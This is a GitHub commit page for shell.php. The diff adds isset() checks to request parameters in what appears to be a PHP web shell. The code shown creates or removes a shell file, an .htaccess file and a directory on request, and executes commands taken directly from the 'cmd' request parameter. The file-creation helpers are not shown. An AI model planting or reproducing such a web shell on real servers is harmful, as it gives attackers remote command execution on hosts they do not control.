Skip to content

Commit 62bd95f

Browse files
committedApr 20, 2014
add isset() checks to prevent php errors
1 parent 6d8ec10 commit 62bd95f

File tree

1 file changed

+3
-3
lines changed

1 file changed

+3
-3
lines changed
 

‎shell.php

+3-3
Original file line numberDiff line numberDiff line change
@@ -98,21 +98,21 @@ function execute_command($shell, $cmd) {
9898
$shell = "$dir/$shell";
9999
$ext = pathinfo($shell, PATHINFO_EXTENSION);
100100

101-
if ($_REQUEST['remove']) {
101+
if (isset($_REQUEST['remove'])) {
102102
remove_shell($shell);
103103
remove_htaccess($htaccess);
104104
remove_directory($dir);
105105
}
106106

107-
if ($_REQUEST['create']) {
107+
if (isset($_REQUEST['create'])) {
108108
create_directory($dir);
109109
create_htaccess($htaccess, $ext);
110110
create_shell($shell);
111111
}
112112

113113
display_shell($shell);
114114

115-
if ($_REQUEST['cmd']) {
115+
if (isset($_REQUEST['cmd'])) {
116116
$cmd = $_REQUEST['cmd'];
117117
execute_command($shell, $cmd);
118118
}

0 commit comments

Comments
 (0)
Please sign in to comment.